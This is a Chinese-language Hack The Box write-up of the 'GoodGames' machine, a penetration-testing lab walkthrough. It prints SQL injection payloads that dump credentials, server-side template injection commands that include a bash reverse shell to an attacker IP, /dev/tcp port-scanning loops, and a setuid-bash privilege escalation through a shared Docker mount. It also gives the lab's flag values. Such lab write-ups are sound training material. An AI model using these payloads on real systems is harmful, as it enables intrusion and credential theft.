GoodGames HTB Writeup
2023-03-13 本文已影响0人
doinb1517
logo.png
知识点
1、sql注入
2、模板注入
3、docker逃逸(没有nmap等工具是应该如何执行主机扫描和端口扫描)
4、setuid提权
WP
常规nmap扫描,只找到了80端口的http服务
┌──(root💀192)-[/home/kali]
└─# nmap -sC -sV 10.10.11.130
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-14 13:41 CST
Nmap scan report for 10.10.11.130
Host is up (0.28s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open ssl/http Werkzeug/2.0.2 Python/3.9.2
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
直接访问web页面,在靶机中应该算是比较炫酷的主页了
01.png
爆破子目录,这里报错了,我们还是应该找到域名再去爆破目录,一般在页面上点击有可能会显示跳转的域名,但是我尝试了一下不太行。
┌──(root💀192)-[/home/kali]
└─# gobuster dir -u http://10.10.11.130/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -r -b 302
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.130/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 302
[+] User Agent: gobuster/3.5
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2023/03/14 13:46:48 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.11.130/a25fddfa-faea-46d6-ae07-5fe9921fbcd7 => 200 (Length: 9265). To continue please exclude the status code or the length
翻到页面最底下,显示了域名GoodGames.HTB
02.png
注册一个账户尝试登陆,发现可以正常登陆成功,于是抓包登陆过程,开始尝试sql注入
03.png
登陆进来就是admin账户
04.png
复制http请求丢尽sqlmap里面跑,但是没有跑出结果,只能尝试手工注入了。
发现回显点是第四个字段
email=a'UNION SELECT 1,2,3,4 -- -&password=
05.png
数据库名称是main
06.png
查看当前数据库中的表名,发现三个表blog,blog_comment,user
email=a'UNION SELECT 1,2,3,concat(table_name,'$') from INFORMATION_SCHEMA.TABLES where table_schema=database() -- -&password=
07.png
显示表结构,user表中有email,id,name,password几个字段
email=a'UNION SELECT 1,2,3,concat(column_name,'$') from INFORMATION_SCHEMA.COLUMNS where table_name="user" -- -&password=
08.png
dump出表内容
email=a'UNION SELECT 1,2,3,concat(name,'\n',password) from user limit 10 -- -&password=
10.png
找到了密码,密码为superadministrator
09.png
得到这个密码暂时还不知道能干嘛,继续看页面,右上角有一个设置按钮,点击会跳转到一个子域名http://internal-administration.goodgames.htb/,将其添加进hosts文件
11.png
发现是一个flask登陆页面,这里可以使用刚才的用户名密码尝试登陆
12.png
成功登陆到后台,看了下是一个Volt模板,又是flask,所以肯定要测试下模板注入,首先我需要找到一个有输入,有回显的地方进行测试。我找到的是settings页面
13.png
成功测试出了模板注入漏洞
14.png
可以看到权限很高,直接就是root
{{ namespace.__init__.__globals__.os.popen('id').read() }}
15.png
反弹shell回来
{{namespace.__init__.__globals__.os.popen('bash -c "bash -i >& /dev/tcp/10.10.14.4/1234 0>&1"').read()}}
root@3a453ab39d3d:/home/augustus# cat user.txt
cat user.txt
650fb0d7e814c6cf6bddbd94207cd90f
反弹的shll很不稳定,获得一个更好的shll
root@3a453ab39d3d:/backend# script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
root@3a453ab39d3d:/backend# ^Z
zsh: suspended nc -lvvp 1234
┌──(root💀192)-[/home/kali]
└─# stty raw -echo; fg 1 ⨯ 1 ⚙
[1] + continued nc -lvvp 1234
root@3a453ab39d3d:/backend#
转到root目录下查看flag时候发现并没有flag保存,发现事情并不简单。
root@3a453ab39d3d:/backend# cat /root/root.txt
cat: /root/root.txt: No such file or directory
root@3a453ab39d3d:/backend# cd /root
root@3a453ab39d3d:~# ls
root@3a453ab39d3d:~#
运行la -al /发现.dockerenv,确认我们在docker容器中,我们需要从docker逃脱到主机上。
root@3a453ab39d3d:~# ls -al /
total 88
drwxr-xr-x 1 root root 4096 Nov 5 2021 .
drwxr-xr-x 1 root root 4096 Nov 5 2021 ..
-rwxr-xr-x 1 root root 0 Nov 5 2021 .dockerenv
drwxr-xr-x 1 root root 4096 Nov 5 2021 backend
drwxr-xr-x 1 root root 4096 Nov 5 2021 bin
drwxr-xr-x 2 root root 4096 Oct 20 2018 boot
drwxr-xr-x 5 root root 340 Mar 14 02:49 dev
drwxr-xr-x 1 root root 4096 Nov 5 2021 etc
drwxr-xr-x 1 root root 4096 Nov 5 2021 home
drwxr-xr-x 1 root root 4096 Nov 16 2018 lib
drwxr-xr-x 2 root root 4096 Nov 12 2018 lib64
drwxr-xr-x 2 root root 4096 Nov 12 2018 media
drwxr-xr-x 2 root root 4096 Nov 12 2018 mnt
drwxr-xr-x 2 root root 4096 Nov 12 2018 opt
dr-xr-xr-x 196 root root 0 Mar 14 02:49 proc
drwx------ 1 root root 4096 Mar 14 04:40 root
drwxr-xr-x 3 root root 4096 Nov 12 2018 run
drwxr-xr-x 1 root root 4096 Nov 5 2021 sbin
drwxr-xr-x 2 root root 4096 Nov 12 2018 srv
dr-xr-xr-x 13 root root 0 Mar 14 02:49 sys
drwxrwxrwt 1 root root 4096 Nov 5 2021 tmp
drwxr-xr-x 1 root root 4096 Nov 12 2018 usr
drwxr-xr-x 1 root root 4096 Nov 12 2018 var
尝试在这台主机上扫描C段IP
root@3a453ab39d3d:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.19.0.2 netmask 255.255.0.0 broadcast 172.19.255.255
ether 02:42:ac:13:00:02 txqueuelen 0 (Ethernet)
RX packets 13659 bytes 3073446 (2.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11577 bytes 7978216 (7.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.111 ms
64 bytes from 172.19.0.2: icmp_seq=1 ttl=64 time=0.075 ms
# 端口扫描
for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null
22 open
80 open
发现172.19.0.1主机是存活的,这个主机应该就是宿主机。进行端口扫描之后发现开放了22和80端口
使用augustus:superadministrator尝试登陆宿主机
root@3a453ab39d3d:/home# ssh augustus@172.19.0.1
augustus@172.19.0.1's password:
Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 14 04:47:25 2023 from 172.19.0.2
augustus@GoodGames:~$ sudo -l
-bash: sudo: command not found
augustus@GoodGames:~$ find / -user root -perm /4000 2>/dev/null
/home/augustus/bash
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/su
augustus@GoodGames:~$ cd /home
augustus@GoodGames:/home$ ls
augustus
augustus@GoodGames:/home$ cd augustus/
augustus@GoodGames:~$ ls
bash test user.txt
在docker中新建一个测试文件,修改文件的权限后发现宿主机中文件的权限也会跟着变
root@3a453ab39d3d:/home/augustus# touch mytest
root@3a453ab39d3d:/home/augustus# ls -al mytest
-rw-r--r-- 1 root root 0 Mar 14 08:08 mytest
# 切换到宿主机中查看权限
augustus@GoodGames:~$ ls -al
total 1236
drwxr-xr-x 3 augustus augustus 4096 Mar 14 08:08 .
drwxr-xr-x 3 root root 4096 Oct 19 2021 ..
-rwsrwxrwx 1 root root 1234376 Mar 14 04:55 bash
lrwxrwxrwx 1 root root 9 Nov 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 augustus augustus 220 Oct 19 2021 .bash_logout
-rw-r--r-- 1 augustus augustus 3526 Oct 19 2021 .bashrc
drwx------ 3 augustus augustus 4096 Mar 14 04:50 .gnupg
-rwSr--r-- 1 root root 0 Mar 14 08:08 mytest
-rw-r--r-- 1 augustus augustus 807 Oct 19 2021 .profile
-rw-r--r-- 1 root root 0 Mar 14 04:53 test
-rw-r----- 1 root augustus 33 Mar 14 02:49 user.txt
给bash加上s位,直接在宿主机中执行.bash -p获取shell,得到的是root权限
augustus@GoodGames:~$ ./bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
8c3edc1cbe6d1e9185a2ac3ac6c3c5ea
bash-5.1#
